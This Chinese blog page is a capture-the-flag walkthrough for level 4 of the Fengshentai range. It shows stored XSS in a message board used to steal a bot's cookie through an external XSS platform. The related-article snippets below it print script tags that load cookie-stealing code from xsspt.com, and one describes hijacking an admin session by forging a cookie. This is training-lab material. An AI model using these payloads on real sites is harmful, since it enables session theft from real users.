封神台靶场-第四章

最新推荐文章于 2024-01-29 17:32:06 发布
原创 最新推荐文章于 2024-01-29 17:32:06 发布 · 1.6k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透测试平台

第四章:为了更多的权限!

Tips:
1、存储型Xss
2、flag在cookie里,格式为zkz{…},xss bot 每10秒访问一次页面
3、自建Xss平台源码:http://www.zkaq.org/?t/99.html

  1. 登陆后根据提示要进行存储型xss注入。
    这里我们可以借助一个xss平台xss平台没有的可以在这里注册

  2. 创建项目
    在这里插入图片描述
    2.选择模块我这里选择自己想要的模块

在这里插入图片描述
3.复制如下代码到可能存在注入的地方

在这里插入图片描述
4.随便填入留言板提交

在这里插入图片描述
5.回到xss平台发现收到xss注入反馈
在这里插入图片描述
flag如下:
在这里插入图片描述

封神台靶场-第二章
Mr_helloword的博客
07-12 3317
第二章:遇到阻难!绕过WAF过滤 1.查找有无sql注入点利用and 1=1发现做了过滤 使用order by 查字段数发现order by 没有被过滤,最后当字段为10时显示正常字段为10 2.因为网做了waf过略防护,这我们考虑用cookie注入,可以进行绕过: 这我们使用一个小工具进行注入(火狐插件) 这款工具可以自定义请求头响应头(Request header,Reponse header) 打开这款插件直接在value处填写注入参数即可然后按上面的键开始(value中的值需要注意的是空
封神台靶场-第五章
Mr_helloword的博客
07-11 2139
第五章- 进击!拿到Web最高权限 Tips: 通过修改Cookie登录后台(没用重打) 2、上传SHELL!3、Flag在web根目录(flag.php) 3.上传图片时建议上传小文件,我建议用QQ表情。 来到传送门提示修改cookie,这我们想到了第四关的flag-cookie信息如下,修改cookie信息,成功进入后台。 cookie:ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC 在存储将上面的cookie值进行修改: 根据提示信息这
封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)
m0_65712192的博客
10-19 2365
封神台 第四章:进击!拿到Web最高权限(绕过防护上传木马)
封神台-第四章:进击!拿到Web最高权限!【配套课时:绕过防护上传木马 实战演练】
08-04 2882
题目: Tips: 1、通过修改Cookie登录后台(没用重打) 2、上传SHELL!3、Flag在web根目录(flag.php) 3.上传图片时建议上传小文件,我建议用QQ表情 尤通过XSS终于得到了管理员Cookie,在修改了cookie后尤直接绕过了登录密码,看到了后台功能! 接下来要做的,就是找一个上传点,上传自己的shell了! ...
ctf实战 封神台靶场 第四关通关记录
weixin_30437847的博客
05-28 1345
发现留言板功能,顺手试下反射xss代码,结果成功的弹窗了 网上的xss平台:http://xsspt.com,需要自己去注册和登录,反正账号密码知道就行了,邮箱反正不验证不建议写真实的。 我们先建立项目,名称什么乱选都行,就是选择模块的时候记得选取这两个 然后你可以看到一叠代码,这个就是两个模块中的XSS Payload。把生成的存储xss链接放入留言板提交成功后到xss平台等查...
mbp 封神台靶场 四 (笔记)
qq_43558415的博客
02-09 734
打开链接,发现是个留言板,尝试xss注入,看看是否可行。 弹出1提示并发现字段变灰,说明注入成功,登录xss平台创建项目。 将此代码段植入刚才的区域中<script src=http://xsspt.com/2gVqle></script>然后查看项目内容发现flag 总结:本关主要是通过xss注入拿到管理员cookie的,见框就插是xss注入的常用手段,它主要通过用户输入...
封神台-第四章 为了更多的权限!留言板
ploto_cs的博客
09-27 1350
封神台-第四章 为了更多的权限!留言板 1.进入留言的面,测试弹窗 根据提示为存储XSS 测试语句为 可以看到成功弹窗 2.搭建xss平台 随意注册一个账户 https://xsspt.com/index.php?do=login 配置前两个必须选 复制语句: </textarea>'"><script src=https://xsspt.com/ZIVFnr?1601173210></script> 3.测试新语句 4.xss平台看截取
封神台-掌控者新靶场 - Kali系列4题
热门推荐
weixin_43821278的博客
03-11 1万+
靶场 - Kali系列【4题】 Kali渗透 - Sqlmap实操靶场
封神台SQL注入-基础靶场1-布尔盲注
原味瓜子、的博客
10-09 1788
1
文件解析漏洞——封神台漏洞靶场
m0_51442886的博客
06-09 1325
本文章禁止转发,如有雷同,后果自负
登录别人的账户(仅在封神台靶场.mp4
04-07
这个教程仅在封神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
封神台存储Xss靶场
qq_40941912的博客
10-05 757
作业 存储Xss靶场 (Rank: 10靶场上面是个finecms,然后在网上搜索了一下它所存在的漏洞,发现在404界面会将地址栏的get传参输入到日志面,存储到数据库,将参数值替换成我们构造好的payload,当管理员产看日志的时候会触发payload,存在一个存储xss 于是找到传参点: 在xss平台建立一个项目,得到构造好的payload: 当作m的参数传进去: 拿到cookie: 成功拿到flag{zKaQ-01sdfDCo0} 提交flag,成功
封神台sql注入的靶场,为了小芳,开冲
Wubuqing的博客
10-27 338
先判断是否存在注入 1=1 返回正常 1=2 返回错误 所以存在SQL注入 使用order by 查询该数据表的字段数量 Order by 2 返回正常 order by 3返回错误 所以字段数量是2 判断回显的位置 Union select 1,22回显 然后查询数据库名 union select 1,database() 得到数据库名为 maoshe 查询路径 union select 1,@@datadir 还有查询数据库版本 Union select 1,version() 然后查询表名
封神台DOM XSS靶场
qq_40941912的博客
10-05 1156
作业 DOM XSS靶场 (Rank: 10) 在面上可填写的地方都输入 Native编码: \u003c\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0032\u0033\u0029\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e 插入到url中,发现弹窗了: 此处的payload被当作代码执行了 把xss平台
封神台靶场跑不了爆破,临时解决办法(亲测有效)
hackzkaq的博客
04-19 3626
最近很多15期的同学都在反馈,靶场跑不了爆破 本人也实测靶场的防护是短时间内ban掉访问频率过快的ip 同样在实战用也会遇到这样的问题,我们不能改变环境的情况下,我们就去适应环境 那么绕过防护的方法目前能实现的就只有两个 1、降低访问频率 2、每次访问使用不同的ip 这两种方法我都帮同学们去实践了,你们按照我测出来的方法直接用就好 第一种,降低访问频率 这种方法目前只在靶场有效,实战中需要根据目标站点的具体防护进行测试 在burp跑爆破的时候,我们需要设置线程数 靶场我在经历过无数次被ban以后,测试出
封神台靶场writeup
weixin_44155363的博客
06-06 1万+
封神台靶场 https://hack.zkaq.cn/battle 还是很有意思的一个靶场 查看源码,找到了字典文件; 用域名爆破工具,放入字典后爆破;答案为:http://8adc3387c2ed6cce.lab.aqlab.cn:81 aqlab.cn 一级域名 lab为二级域名 kali01就是三级域名; https://site.ip138.com/ 这个网站能通过同ip网站能直接查处结果; shop.aqlab.cn:8001 nmap完全扫描可发现,快速扫描无法发现; n
mbp 封神台靶场 一(笔记)
qq_43558415的博客
02-09 1万+
最近在看掌控安全的公开课,面提到了封神台靶场,因为以前也做过网易云课堂的靶场,便轻车熟路地注册了账号登陆靶场,先看了第一关。第一关是通过SQL注入找到管理员密码,打开链接,点进去一看发现有猫腻。 一、寻找注入点 看到id=1,便可以用id=1’或id=1 and 1=2来进行测试,以id=1’为例,发现网出现了错误。 二、判断字段数 在发现这可以进行SQL注入后便要判断它的字段数,用...
封神台反射XSS靶场
qq_40941912的博客
10-05 782
作业 反射XSS靶场 (Rank: 5) 靶场上面是一个输入框,输入查看是否存在xss漏洞: 发现并没有任何反应 查看源码后发现,两个尖括号被替换成html面用字符表示出来的尖括号: 尖括号被过滤了,然后尝试在输入框内闭合引号,添加onfocus事件: 点击输入框: 触发了onfocus事件,拿到flag{zkaq-xssgood-Q0OA} 提交flag,成功 ...
封神台靶场-第二章-绕WAF
weixin_58456542的博客
01-29 484
封神台-绕waf
封神台靶场第四关
最新发布
03-27
### 封神台靶场第四关解决方案 封神台靶场是一个专门用于练习 Web 安全技能的平台,其中每一关都涉及不同的安全漏洞和技术挑战。对于第四关,目标通常围绕着通过修改 Cookie 来获取敏感数据或权限提升。 #### 背景分析 在这一关中,用户需要利用之前提到的 `Cookie` 修改技巧来绕过系统的身份验证机制并访问受保护的内容。具体来说,可以通过设置特定的 `Cookie` 值实现对后台管理面的访问[^1]。以下是详细的解决方法: --- #### 技术细节与操作流程 ##### 1. **理解目标** 本关的核心在于识别系统如何依赖于客户端发送的 `Cookie` 进行认证,并尝试伪造合法的身份标识符以获得更高权限。这一步骤涉及到 HTTP 协议中的会话管理和安全性缺陷的知识点[^2]。 ##### 2. **工具准备** 为了完成此任务,可以借助浏览器开发者工具或者第三方插件(如 Burp Suite),这些工具有助于拦截和篡改请求头中的信息。 - 打开浏览器控制台 (`F12`) 并切换到“网络(Network)”标签- 刷新当前网以便捕获所有发出的数据包。 ##### 3. **定位关键参数** 观察登录后的响应消息,在返回的结果找到名为 `ADMINSESSIONIDCSTRCSDQ` 的字段及其对应的值。这是服务器用来跟踪用户的唯一标志之一。 ```bash Set-Cookie: ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC; Path=/; HttpOnly ``` 上述代码片段展示了实际使用的 Session ID 形式;注意这的属性可能还包括其他选项比如 Secure 或者 Expires/Max-Age 等定义生命周期的信息。 ##### 4. **实施攻击** 一旦明确了应该调整哪个部分,则可以直接编辑本地存储内的相应条目使之匹配预期格式即可顺利通行至下一步界面[^3]。 执行以下动作: - 在 Storage Inspector 中查找现有的 Cookies; - 删除旧版本记录重新创建一条新纪录其名称保持一致但赋予新的随机字符串作为 Value 部分。 > 注意事项:确保所输入内容符合编码规则以免引起解析错误影响后续判断逻辑准确性。 --- #### Python脚本辅助自动化过程 如果希望进一步简化重复劳动量较大的环节还可以编写简单的Python程序帮助快速生成所需的payloads: ```python import random import string def generate_random_string(length): letters_and_digits = string.ascii_letters + string.digits result_str = ''.join((random.choice(letters_and_digits) for i in range(length))) return result_str session_id_length = 20 # 自定义长度依据实际情况设定 new_session_value = f"{generate_random_string(session_id_length)}" print(f"New forged session value is : {new_session_value}") ``` 运行以上脚本将会得到一个新的伪随机数串可以用作替换原始Session Token的基础素材。 --- ### 总结说明 通过对封神台靶场第四关的学习实践不仅能够加深学员们关于Web应用程序常见安全隐患的认识程度而且还能锻炼动手解决问题的能力从而更好地适应未来工作中遇到的各种复杂场景需求.
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值